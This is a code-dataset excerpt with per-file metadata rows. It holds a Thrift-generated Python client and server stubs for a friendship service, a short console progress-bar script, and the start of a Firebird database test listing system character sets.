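#   pytest tests/test_cvb.py --benchmark-only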
| 36.908571 | 88 | 0.619446 | 803 | 6,459 | 4.759651 | 0.084682 | 0.094192 | 0.075353 | 0.10675 | 0.93145 | 0.92831 | 0.90293 | 0.90293 | 0.90293 | 0.90293 | 0 | 0.013072 | 0.265676 | 6,459 | 174 | 89 | 37.12069 | 0.792747 | 0 | 0 | 0.806452 | 0 | 0 | 0.015482 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 1 | 0.096774 | false | 0 | 0.032258 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4e1907f5655dbca0c8b621be208f77f0b91d7c6d | 28,137 | py | Python | client/python/socialcoffee/gen-py/socialcoffee/thrift/SocialCoffeeService.py | iaintshine/social_coffee | 7b86f4cddf9576ec45206d340fd294475ce7a67f | [
"MIT"
] | 1 | 2020-04-13T10:44:09.000Z | 2020-04-13T10:44:09.000Z | client/python/socialcoffee/gen-py/socialcoffee/thrift/SocialCoffeeService.py | iaintshine/social_coffee | 7b86f4cddf9576ec45206d340fd294475ce7a67f | [
"MIT"
] | null | null | null | client/python/socialcoffee/gen-py/socialcoffee/thrift/SocialCoffeeService.py | iaintshine/social_coffee | 7b86f4cddf9576ec45206d340fd294475ce7a67f | [
"MIT"
] | null | null | null | #
# Autogenerated by Thrift Compiler (1.0.0-dev)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import fb303.FacebookService
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface(fb303.FacebookService.Iface):
"""
Service: SocialCoffeeService
"""
def ping(self):
"""
Returns a "pong" string.
@return
"pong" string.
@throws never
"""
pass
def get_friends(self, id):
"""
Returns a list of friends of the user with the provided ID.
@param id
The ID of the user for whom the list of friends should be retrieved.
@return
The list of the user's friends' IDs. If the user has no friends, an empty list is returned.
@throws SocialException <ul>
<li>if ID is null</li>
<li>if ID is not a number<li>
<li>if ID is a non positive number</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- id
"""
pass
def create_friendship(self, usera, userb):
"""
Asks the service to make a new mutual friendship relationship between users with IDs usera and userb.
It's an idempotent operation so it can be called multiple times.
@param usera
The ID of the user A.
@param userb
The ID of the user B.
@return
Boolean value indicating whether the operation created a new relationship or the relationship already existed.
"true" if the operation created a new friendship relationship, "false" otherwise.
@throws SocialException <ul>
<li>if any of IDs is null</li>
<li>if any of IDs is not a number<li>
<li>if any of IDs is a non positive number</li>
<li>if both of IDs are equal</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- usera
- userb
"""
pass
def remove_friendship(self, usera, userb):
"""
Asks the service to remove an existing friendship relationship between users with IDs usera and userb.
It's an idempotent operation so it can be called multiple times.
@param usera
The ID of the user A.
@param userb
The ID of the user B.
@return
Boolean value indicating whether the operation removed an existing relationship or did nothing.
"true" if the operation removed an existing friendship relationship, "false" otherwise.
@throws SocialException <ul>
<li>if any of IDs is null</li>
<li>if any of IDs is not a number<li>
<li>if any of IDs is a non positive number</li>
<li>if both of IDs are equal</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- usera
- userb
"""
pass
class Client(fb303.FacebookService.Client, Iface):
"""
Service: SocialCoffeeService
"""
def __init__(self, iprot, oprot=None):
fb303.FacebookService.Client.__init__(self, iprot, oprot)
def ping(self):
"""
Returns a "pong" string.
@return
"pong" string.
@throws never
"""
self.send_ping()
return self.recv_ping()
def send_ping(self):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = ping_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "ping failed: unknown result");
def get_friends(self, id):
"""
Returns a list of friends of the user with the provided ID.
@param id
The ID of the user for whom the list of friends should be retrieved.
@return
The list of the user's friends' IDs. If the user has no friends, an empty list is returned.
@throws SocialException <ul>
<li>if ID is null</li>
<li>if ID is not a number<li>
<li>if ID is a non positive number</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- id
"""
self.send_get_friends(id)
return self.recv_get_friends()
def send_get_friends(self, id):
self._oprot.writeMessageBegin('get_friends', TMessageType.CALL, self._seqid)
args = get_friends_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_friends(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_friends_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.ex is not None:
raise result.ex
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_friends failed: unknown result");
def create_friendship(self, usera, userb):
"""
Asks the service to make a new mutual friendship relationship between users with IDs usera and userb.
It's an idempotent operation so it can be called multiple times.
@param usera
The ID of the user A.
@param userb
The ID of the user B.
@return
Boolean value indicating whether the operation created a new relationship or the relationship already existed.
"true" if the operation created a new friendship relationship, "false" otherwise.
@throws SocialException <ul>
<li>if any of IDs is null</li>
<li>if any of IDs is not a number<li>
<li>if any of IDs is a non positive number</li>
<li>if both of IDs are equal</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- usera
- userb
"""
self.send_create_friendship(usera, userb)
return self.recv_create_friendship()
def send_create_friendship(self, usera, userb):
self._oprot.writeMessageBegin('create_friendship', TMessageType.CALL, self._seqid)
args = create_friendship_args()
args.usera = usera
args.userb = userb
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_create_friendship(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = create_friendship_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.ex is not None:
raise result.ex
raise TApplicationException(TApplicationException.MISSING_RESULT, "create_friendship failed: unknown result");
def remove_friendship(self, usera, userb):
"""
Asks the service to remove an existing friendship relationship between users with IDs usera and userb.
It's an idempotent operation so it can be called multiple times.
@param usera
The ID of the user A.
@param userb
The ID of the user B.
@return
Boolean value indicating whether the operation removed an existing relationship or did nothing.
"true" if the operation removed an existing friendship relationship, "false" otherwise.
@throws SocialException <ul>
<li>if any of IDs is null</li>
<li>if any of IDs is not a number<li>
<li>if any of IDs is a non positive number</li>
<li>if both of IDs are equal</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- usera
- userb
"""
self.send_remove_friendship(usera, userb)
return self.recv_remove_friendship()
def send_remove_friendship(self, usera, userb):
self._oprot.writeMessageBegin('remove_friendship', TMessageType.CALL, self._seqid)
args = remove_friendship_args()
args.usera = usera
args.userb = userb
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_remove_friendship(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = remove_friendship_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.ex is not None:
raise result.ex
raise TApplicationException(TApplicationException.MISSING_RESULT, "remove_friendship failed: unknown result");
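# Example client usage (a sketch, not generated by Thrift; host, port and the framed
# transport below are assumptions -- adjust them to your deployment):
#   from thrift.transport import TSocket
#   transport = TTransport.TFramedTransport(TSocket.TSocket('localhost', 9090))
#   client = Client(TBinaryProtocol.TBinaryProtocol(transport))
#   transport.open()
#   client.create_friendship(1, 2)
#   print client.get_friends(1)
#   transport.close()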
class Processor(fb303.FacebookService.Processor, Iface, TProcessor):
def __init__(self, handler):
fb303.FacebookService.Processor.__init__(self, handler)
self._processMap["ping"] = Processor.process_ping
self._processMap["get_friends"] = Processor.process_get_friends
self._processMap["create_friendship"] = Processor.process_create_friendship
self._processMap["remove_friendship"] = Processor.process_remove_friendship
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
result.success = self._handler.ping()
oprot.writeMessageBegin("ping", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_friends(self, seqid, iprot, oprot):
args = get_friends_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_friends_result()
try:
result.success = self._handler.get_friends(args.id)
except SocialException, ex:
result.ex = ex
oprot.writeMessageBegin("get_friends", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_create_friendship(self, seqid, iprot, oprot):
args = create_friendship_args()
args.read(iprot)
iprot.readMessageEnd()
result = create_friendship_result()
try:
result.success = self._handler.create_friendship(args.usera, args.userb)
except SocialException, ex:
result.ex = ex
oprot.writeMessageBegin("create_friendship", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_remove_friendship(self, seqid, iprot, oprot):
args = remove_friendship_args()
args.read(iprot)
iprot.readMessageEnd()
result = remove_friendship_result()
try:
result.success = self._handler.remove_friendship(args.usera, args.userb)
except SocialException, ex:
result.ex = ex
oprot.writeMessageBegin("remove_friendship", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_friends_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.id = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_friends_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.I32, 1)
oprot.writeI32(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_friends_result:
"""
Attributes:
- success
- ex
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.I32,None), None, ), # 0
(1, TType.STRUCT, 'ex', (SocialException, SocialException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, ex=None,):
self.success = success
self.ex = ex
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in xrange(_size0):
_elem5 = iprot.readI32();
self.success.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.ex = SocialException()
self.ex.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_friends_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.I32, len(self.success))
for iter6 in self.success:
oprot.writeI32(iter6)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.ex is not None:
oprot.writeFieldBegin('ex', TType.STRUCT, 1)
self.ex.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class create_friendship_args:
"""
Attributes:
- usera
- userb
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'usera', None, None, ), # 1
(2, TType.I32, 'userb', None, None, ), # 2
)
def __init__(self, usera=None, userb=None,):
self.usera = usera
self.userb = userb
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.usera = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.userb = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('create_friendship_args')
if self.usera is not None:
oprot.writeFieldBegin('usera', TType.I32, 1)
oprot.writeI32(self.usera)
oprot.writeFieldEnd()
if self.userb is not None:
oprot.writeFieldBegin('userb', TType.I32, 2)
oprot.writeI32(self.userb)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class create_friendship_result:
"""
Attributes:
- success
- ex
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'ex', (SocialException, SocialException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, ex=None,):
self.success = success
self.ex = ex
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.ex = SocialException()
self.ex.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('create_friendship_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.ex is not None:
oprot.writeFieldBegin('ex', TType.STRUCT, 1)
self.ex.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class remove_friendship_args:
"""
Attributes:
- usera
- userb
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'usera', None, None, ), # 1
(2, TType.I32, 'userb', None, None, ), # 2
)
def __init__(self, usera=None, userb=None,):
self.usera = usera
self.userb = userb
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.usera = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.userb = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('remove_friendship_args')
if self.usera is not None:
oprot.writeFieldBegin('usera', TType.I32, 1)
oprot.writeI32(self.usera)
oprot.writeFieldEnd()
if self.userb is not None:
oprot.writeFieldBegin('userb', TType.I32, 2)
oprot.writeI32(self.userb)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class remove_friendship_result:
"""
Attributes:
- success
- ex
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'ex', (SocialException, SocialException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, ex=None,):
self.success = success
self.ex = ex
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.ex = SocialException()
self.ex.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('remove_friendship_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.ex is not None:
oprot.writeFieldBegin('ex', TType.STRUCT, 1)
self.ex.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
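# A hedged usage sketch (not part of the generated module): round-tripping one
# of these argument structs through TBinaryProtocol over an in-memory transport.
# It assumes the standard Apache Thrift Python runtime is installed; only names
# defined by this generated module are used.
#
#   buf = TTransport.TMemoryBuffer()
#   args = get_friends_args(id=42)
#   args.write(TBinaryProtocol.TBinaryProtocol(buf))
#   decoded = get_friends_args()
#   decoded.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(buf.getvalue())))
#   assert decoded == args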
| 30.517354 | 188 | 0.666169 | 3,478 | 28,137 | 5.188327 | 0.067568 | 0.015794 | 0.025436 | 0.01995 | 0.874148 | 0.854142 | 0.839124 | 0.820338 | 0.809255 | 0.809255 | 0 | 0.006332 | 0.225433 | 28,137 | 921 | 189 | 30.550489 | 0.821648 | 0.006788 | 0 | 0.809211 | 1 | 0 | 0.029287 | 0.004027 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.006579 | 0.011513 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
4e3173e4618c108c1544af980f164d2dfe4fd074 | 568 | py | Python | pre/progressbar.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | pre/progressbar.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | pre/progressbar.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | from time import sleep
# Animate a fixed-width progress bar that "types" its message one frame at a time.
frames = ['', 'H', 'HE', 'HEL', 'HELL', 'HELLO', 'HELLO T', 'HELLO TI', 'HELLO TIM']
for i, frame in enumerate(frames):
    print('\r|' + frame.ljust(22, '_') + '|', end='\r')
    if i < len(frames) - 1:
        sleep(0.1)
print()
| 27.047619 | 48 | 0.642606 | 76 | 568 | 2.710526 | 0.223684 | 0.262136 | 0.349515 | 0.38835 | 0.757282 | 0.757282 | 0.757282 | 0.427184 | 0 | 0 | 0 | 0.032064 | 0.121479 | 568 | 20 | 49 | 28.4 | 0.380762 | 0 | 0 | 0.421053 | 0 | 0 | 0.459854 | 0.284672 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.052632 | 0 | 0.052632 | 0.526316 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
9d7006be530437855b5d56aebd8a0442bef5f6f2 | 76,063 | py | Python | tests/functional/basic/db/test_02.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2022-02-05T11:37:13.000Z | 2022-02-05T11:37:13.000Z | tests/functional/basic/db/test_02.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2021-09-03T11:47:00.000Z | 2021-09-03T12:42:10.000Z | tests/functional/basic/db/test_02.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2021-06-30T14:14:16.000Z | 2021-06-30T14:14:16.000Z | #coding:utf-8
#
# id: functional.basic.db.02
# title: Empty DB - RDB$CHARACTER_SETS
# description: Check the correct content of RDB$CHARACTER_SETS for empty database
# tracker_id:
# min_versions: []
# versions: 3.0
# qmid: functional.basic.db.db_02
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('RDB\\$SECURITY_CLASS[ ]+SQL\\$.*', '')]
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
set list on;
set blob all;
set count on;
select * from rdb$character_sets order by rdb$character_set_id;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
RDB$CHARACTER_SET_NAME NONE
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME NONE
RDB$CHARACTER_SET_ID 0
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$182
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME OCTETS
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME OCTETS
RDB$CHARACTER_SET_ID 1
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$183
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ASCII
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ASCII
RDB$CHARACTER_SET_ID 2
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$184
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME UNICODE_FSS
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME UNICODE_FSS
RDB$CHARACTER_SET_ID 3
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
